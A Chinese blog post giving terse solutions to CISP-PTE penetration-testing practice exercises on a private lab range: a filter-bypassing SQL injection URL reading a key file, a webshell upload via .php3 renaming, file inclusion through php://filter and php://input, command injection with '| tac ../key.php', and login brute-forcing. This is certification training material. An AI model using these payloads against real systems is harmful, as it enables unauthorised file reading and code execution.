CISP-PTE靶场基础题练习

最新推荐文章于 2024-05-03 16:15:08 发布
最新推荐文章于 2024-05-03 16:15:08 发布
阅读量237 收藏
点赞数
文章标签: 网络安全 安全 网络攻击模型 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_49279494/article/details/133617390
版权

1.sql注入

http://10.0.0.25:81/vulnerabilities/fu1.php?id=1%27)/**/and/**/1=2/**/uniunionon/**/select/**/1,load_file(%27/tmp/360/key%27),3,4%23

2.文件上传

先把以hao.php结尾的木马修改称hao.jpg的形式,通过抓包修改成hao.php3以上传,搜索下面的url

http://10.0.0.25:82/vulnerabilities/hao.php3

3.文件包含

方法一:

方法二:http://10.0.0.25:83/vulnerabilities/fu1.php?file=php://filter/read=convert.base64-encode/resource=../key.php

然后通过base64解码

方法三:通过BURP抓包,file那里输入php://input,请求下面输入请求的代码<?php highlight_file('../key.php');?>

4.基础题目之命令执行

通过输入命令| tac ../key.php,就可以获得key的值

5. 基础题目之日志分析

查看日志,找到172.16.12.12这个IP,并且锁定http://10.0.0.25:85 /adminlogin.php这个网址,输入任意账号密码,通过Burp抓包进行暴力破解得到账号admin密码password,成功拿到key值

Attacker0824
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
CISP及答案.pdf
08-17
CISP及答案.pdf
cisp-pte渗透测试资源下载 (考试环境+库)
11-26
cisp-pte渗透测试资源下载 ,包括 考试环境、目。
2024年网安最新cisp-pte通关靶场思路分享_cisp-pte靶场(1)
最新发布
2401_84297560的博客
05-03 437
文章写在还有兄弟不知道网络安全面试可以提前刷吗?费时一周整理的160+网络安全面试,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
CISP-PTE学习总结之基础练习(三)
千寻的博客
10-20 5612
练习目一:SQL注入 0x01 目要求 0x02 解答过程: 0x03 解总结: 练习目二:文件上传突破 0x01 目要求: 0x02 解过程: 0x03 解总结: 练习目三:文件包含 0x01 目要求 0x02 解过程 0x03 解总结: 练习目四:反序列化漏洞 0x01 目要求: 0x02 解过程 练习目五:失效的访问控制 0x01 目·要求: 0x02 解过程: 0x03 解总结:
CISP-PTE演示
热门推荐
weixin_48421613的博客
03-28 1万+
周末帮好兄弟做PTE的真,觉得确实挺有意思的,于是就有了这篇文章,侵删侵删哈 第一阶段 基础目一:SQL注入 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 ​ 开始答 这道的有趣的地方就是,你先注册用户,不同于以往的360的PTE,并不是以admin用户去发表文章就能看到key,按照往常的先注册一个用户吧 可以看见,此时提示的代码显示过滤掉“#”、“–”​注释符号,我们先正常写一篇文章试试 可以看见,这是
CISP-PTE学习总结之基础练习(二)
千寻的博客
10-20 7569
基础目一:SQL注入 0x01 目要求 0x02 解过程 基础目二:文件上传突破 0x01 目要求 0x02 解过程 基础目三:文件包含 0x01 目要求 0x02 解过程 0x03 解总结 基础目四:代码执行漏洞 0x01 目要求 0x02 解过程 0x03 解总结 基础目五:失效的访问控制 0x01 目要求 0x02 解过程
CISP-PTE考前实操练习
2301_79546223的博客
09-13 930
CISP-PTE考前学习练习目,渗透测试功工程师
CISP-PTE靶场(win+centos).zip
03-13
CISP-PTE靶场是一个针对信息安全专业人员进行渗透测试与应急响应能力训练的平台,它涵盖了Windows和Linux两种操作系统环境。这个压缩包包含了两个不同系统的靶场环境:win2003和CentOS,以及一个关于如何搭建CISP-...
cisp-pte考试环境下载-原
04-01
本考试为业内首家实操型渗透测试技术水平注册考试,考试内容从多个角度出发,将客观实操题两者结合,来考核考生的全面能力。通过多个得分点,充分检验考生对于最新网络安全技术的掌握程度,展现考生在真实的网络...
cisp-pte考试环境下载-原 库.txt
03-06
本考试为业内首家实操型渗透测试技术水平注册考试,考试内容从多个角度出发,将客观实操题两者结合,来考核考生的全面能力。通过多个得分点,充分检验考生对于最新网络安全技术的掌握程度,展现考生在真实的网络...
CISP-PTE培训PPT讲义.zip
09-09
CISP-PTE渗透测试工程师认证培训讲义PPT: 操作系统安全 windows操作系统安全 数据库安全 Web安全基础 HTTP协议 注入漏洞 XSS漏洞 请求伪造漏洞 文件处理漏洞 访问控制漏洞 会话管理漏洞 实战练习 中间件安全-...
CISP-PTE渗透测试工程师知识体系大纲 (很全)
06-12
可以说是非常全面了,把大纲内的知识点全部了解并可以实操,考试必过,工资必涨。
CISP2019最新练习.rar
11-25
7套目,如果有可以不用下,补充了部分新。10月考试亲测有用。
CISP-PTE综合(一)
Zt_Zk的博客
09-04 4122
一个综合靶场,做了一下综合
CISP-PTE实操练习讲解一(新版)
lza20001103的博客
08-05 1万+
CISP-PTE实操练习讲解一(新版)
CISP-PTE综合靶场训练
weixin_46263525的博客
07-11 1565
CISP-PTE综合靶场训练及解思路
CISP-PTE靶场基础实训一
weixin_46249630的博客
12-01 1577
CISP-PTE靶场基础实训思路详解
CISP-PTE八套真详解(侵删)_cisp-pte与答案,万字长文轻松彻底入门Flutter
2401_83947398的博客
04-03 2176
接下来就是代码审计了isset()函数用于检测变量是否已设置并且非 NULL代码中base64解码出来是一个base64的一句话木马根据代码,需要我们提交一个Hello参数,参数的值为多少都行,然后我们可以通过提交z0参数的base64值进行执行命令先用phpinfo();试一下:发现执行成功那么直接写个查看key文件的系统命令(记得最后要加分号)在源代码中找到key。
cisp-pte考试实操题
06-13
CISP- PTE 考试是指中华人民共和国国家计算机信息系统安全专业人员职业资格考试(CISP)中的“计算机安全专业技能水平考试”(PTE)。这个考试主要测试考生在计算机安全方面的专业技能,包括网络安全、系统安全、应用安全等方面。考试形式包括理论考试和实操考试两部分,其中实操考试主要测试考生在实际操作中解决安全的能力。 由于 CISP- PTE 考试实操题的内容比较具体和详细,其型和考试内容也随着考试的不同而有所差异。一般来说,考试实操题会涉及以下方面: 1. 系统配置与安全加固; 2. 系统漏洞扫描与修复; 3. 网络安全监控与防御; 4. 应用安全测试与分析; 5. 数据库安全管理与加密; 6. 信息安全事件响应与处理; 7. 安全策略与管理等方面。 如果您需要更具体的实操题目,建议您参考相关的考试指南或考试教材。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值